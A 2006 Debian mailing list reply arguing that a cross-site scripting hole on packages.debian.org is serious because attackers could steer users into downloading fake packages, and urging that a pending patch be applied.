Cross-site scripting on packages.debian.org
On Mon, Dec 11, 2006 at 06:51:34PM +0100, Javier Fernández-Sanguino Peña wrote:
> This is not code injection, it's cross site-scripting. Given that:
>
> - packages.debian.org does not have any kind of client authentication
> - packages.debian.org does not use SSL certificate
>
> this is as much a problem as somebody being able to setup a "fake"
> packages.debian.org or do MITM injection.
I beg to differ! This is a very serious problem, as this XSS hole can
easily be abused to trick people into downloading fake packages, which
means the attacker gets root on their machines. "I'm certain I downloaded
this file from packages.d.o, so surely it must be the right one?!"
The only thing they need to do to fall victim to this is to go to
packages.d.o via a link that the attacker controls. For example, this
could be done with a fake posting to bugtraq. Someone, please apply
Javier's patch as soon as possible!!
http://bugs.debian.org/402631
Cheers,
Richard
--
__ _
|_) /| Richard Atterer | GnuPG key: 888354F7
| \/¯| http://atterer.net | 08A9 7B7D 3D13 3EF2 3D25 D157 79E6 F6DC 8883 54F7
¯ '` ¯
Reply to: